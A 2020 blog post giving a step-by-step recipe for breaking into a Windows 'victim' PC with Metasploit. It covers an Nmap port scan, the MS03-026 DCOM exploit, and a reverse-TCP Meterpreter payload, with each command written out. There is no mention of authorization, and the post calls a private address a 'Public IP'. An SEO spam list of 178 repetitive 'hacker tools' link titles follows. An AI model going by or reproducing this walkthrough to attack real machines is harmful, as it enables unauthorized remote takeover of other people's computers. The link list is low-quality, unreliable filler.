Saturday, August 22, 2020

HOW TO HACK A PC REMOTELY WITH METASPLOIT?

Metasploit is an advanced hacking tool that comes itself with a complete lack of advanced penetration testing tools. Penetration testers and hackers are taking so much advantage of this tool. It's a complete hack pack for a hacker that he can play almost any attack with it. I am not covering attacks in this article but I am going to share about how to hack a PC remotely with Metasploit. It's not so complicated if you pay attention to. It just needs a better understanding of each step you're performing. Let's move on how to do it.

SO, HOW TO HACK A PC REMOTELY WITH METASPLOIT?

REQUIREMENTS

Before getting started, make sure you have all the following things required to hack a PC remotely with Metasploit.
  • Linux Machine (Kali Linux or BackTrack 5)
  • Metasploit (Built in the mentioned Linux OS)
  • Windows PC victim

STEPS TO FOLLOW

Let's move on how to perform the complete attack.
  • Start your Linux OS and open up Nmap and run a scan for your victim remote server. Like we have our victim on remote server 192.168.42.129. It will show up the range of all open ports of the victim machine as you can see below.
  • We can see the open port here is 135. So, now we go to Metasploit and try to exploit and gain access to it. To open up, navigate to Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.
  • After the initialization of msfconsole, standard checks, we will see the window like below.
  • Now, as we already know that our port 135 is open so, we search for a related RPC exploit in Metasploit. You can check out all the exploit list supported by Metasploit by using command 'show exploits'.
  • Now to activate an exploit, type the "use " with the exploit name like "use exploit/windows/dcerpc/ms03_026_dcom".
  • As we're in our required exploit environment, we need to configure the exploit according to our scenario. To check out the list of all the available options of an exploit, we can use command "show options". As we already know about the open port RPORT is 135. So, we just need to set our RHOST which we can set simply using the "set RHOST" command. Just type "set RHOST 192.168.42.129" and it's done.
  • Now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.
  • Every payload can be used for a different scenario. In our case, we are using the reverse TCP meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" for remote shell and then use "show options" command to view the options for it.
  • Here we notice LHOST for out payload is not set, so we set it out to our Public IP i.e. 192.168.42.128 using the command "set LHOST 192.168.42.128".
  • Now exploit is configured and ready to launch. Now simply use "exploit" command to launch the attack. If exploit is executed successfully, we will see the message like below.
  • Now that a reverse connection has been set up between the victim and our machine, we have complete control of the server.  To find out all the commands to play with the victim machine, we can use the "help".

We have successfully gained access to a remote PC with Metasploit. That's all how to hack a PC remotely with Metasploit. Hope it will work for you.
Related links

  1. Hacker Tools 2019
  2. Hacker Tools Windows
  3. Pentest Tools Free
  4. Hacker Tools
  5. Pentest Tools Tcp Port Scanner
  6. Hack Tools For Ubuntu
  7. Android Hack Tools Github
  8. World No 1 Hacker Software
  9. Hacker Tool Kit
  10. Hacker Techniques Tools And Incident Handling
  11. Pentest Tools Website
  12. Github Hacking Tools
  13. Hacker
  14. Game Hacking
  15. Top Pentest Tools
  16. Install Pentest Tools Ubuntu
  17. Best Hacking Tools 2020
  18. Hack Tools For Pc
  19. Hack Apps
  20. Hacker Tools Hardware
  21. Hacker Tools
  22. Best Pentesting Tools 2018
  23. Hack Tools 2019
  24. Pentest Tools Bluekeep
  25. Hack Tools
  26. What Are Hacking Tools
  27. Pentest Tools Online
  28. Hack Apps
  29. Hacking Tools Kit
  30. Hacking Tools Free Download
  31. Hak5 Tools
  32. Nsa Hacker Tools
  33. Pentest Tools Nmap
  34. Hack App
  35. Pentest Tools Linux
  36. World No 1 Hacker Software
  37. Termux Hacking Tools 2019
  38. Hack Tools For Games
  39. Hack Tools Pc
  40. Pentest Tools Framework
  41. Hacking Tools Windows 10
  42. Hacker Tools For Pc
  43. Hacker Tools Free
  44. How To Hack
  45. Pentest Tools Nmap
  46. Hacker Tools Mac
  47. Hack Tools Online
  48. Hacking Tools Name
  49. Hack Tools
  50. Hacking Tools For Beginners
  51. Pentest Tools
  52. How To Install Pentest Tools In Ubuntu
  53. Pentest Tools
  54. Hak5 Tools
  55. Hack Tools For Pc
  56. Hacking Tools 2020
  57. Pentest Tools Subdomain
  58. Hacker Tool Kit
  59. Pentest Tools
  60. Pentest Tools Online
  61. Hack Tool Apk No Root
  62. Hacking Tools
  63. Pentest Tools For Android
  64. Hack Tools For Ubuntu
  65. Hack Tools 2019
  66. Pentest Tools Subdomain
  67. Hacking Apps
  68. Game Hacking
  69. Top Pentest Tools
  70. Hacker Tools 2020
  71. World No 1 Hacker Software
  72. Pentest Tools Subdomain
  73. Hacker Tools Free
  74. Hack Tools Pc
  75. Nsa Hack Tools
  76. Hack Tools For Windows
  77. Hack Tools
  78. Nsa Hack Tools
  79. Hacking Tools Usb
  80. Tools 4 Hack
  81. Growth Hacker Tools
  82. Hack Tools Online
  83. Best Hacking Tools 2019
  84. Computer Hacker
  85. Hacker Tools List
  86. Hack Tools For Ubuntu
  87. Hacking Tools Windows 10
  88. Hak5 Tools
  89. Pentest Tools Find Subdomains
  90. What Are Hacking Tools
  91. Install Pentest Tools Ubuntu
  92. World No 1 Hacker Software
  93. Hacker
  94. Hack Tools Pc
  95. How To Make Hacking Tools
  96. Hackrf Tools
  97. Hack Tools Github
  98. Hacker Tools Hardware
  99. Hacking Tools For Mac
  100. Hacker Techniques Tools And Incident Handling
  101. Usb Pentest Tools
  102. Hack Tool Apk
  103. Nsa Hacker Tools
  104. Hacking Apps
  105. Hack Tools For Mac
  106. Hacking Tools 2019
  107. How To Install Pentest Tools In Ubuntu
  108. Hack Apps
  109. Pentest Tools Tcp Port Scanner
  110. Pentest Tools Open Source
  111. Pentest Tools Kali Linux
  112. Hacker Tool Kit
  113. Hacker Tools For Windows
  114. Usb Pentest Tools
  115. What Is Hacking Tools
  116. Hack Tools Mac
  117. Hacking Tools Mac
  118. Growth Hacker Tools
  119. Hacker Tools Apk Download
  120. Ethical Hacker Tools
  121. Hacking Tools For Beginners
  122. Pentest Tools List
  123. What Is Hacking Tools
  124. Underground Hacker Sites
  125. Hacking Tools For Windows 7
  126. Pentest Tools Kali Linux
  127. Computer Hacker
  128. Pentest Tools Open Source
  129. How To Make Hacking Tools
  130. Ethical Hacker Tools
  131. Hack Tools For Pc
  132. Hacker Tools Windows
  133. World No 1 Hacker Software
  134. How To Install Pentest Tools In Ubuntu
  135. Hack Tools Online
  136. Hacker Tools Apk
  137. Wifi Hacker Tools For Windows
  138. Nsa Hacker Tools
  139. Pentest Tools Apk
  140. Hackers Toolbox
  141. How To Make Hacking Tools
  142. Hacker Tool Kit
  143. Hacking Tools Free Download
  144. Hacking Tools Online
  145. Bluetooth Hacking Tools Kali
  146. Pentest Tools Windows
  147. Hacking Tools For Kali Linux
  148. Hack Rom Tools
  149. Hacking Tools Download
  150. Hack Tool Apk No Root
  151. Hacker Tools Free
  152. Hacking Tools And Software
  153. Hacker Tools For Pc
  154. Hacker Tools Windows
  155. Hacker Tools Mac
  156. Hacking Tools Free Download
  157. Free Pentest Tools For Windows
  158. Pentest Tools Url Fuzzer
  159. Pentest Tools Windows
  160. Hacker
  161. Pentest Tools Website Vulnerability
  162. Hacker Tools Apk Download
  163. How To Make Hacking Tools
  164. Pentest Reporting Tools
  165. Hacker Tools Free Download
  166. Hacking Tools Online
  167. Usb Pentest Tools
  168. Hack Tool Apk
  169. Hacker Tools Software
  170. Pentest Tools Linux
  171. Hack App
  172. How To Make Hacking Tools
  173. Pentest Recon Tools
  174. Hacker Tools For Mac
  175. Pentest Tools For Windows
  176. Hacker Tools Apk
  177. Pentest Tools For Windows
  178. Bluetooth Hacking Tools Kali

No comments:

Post a Comment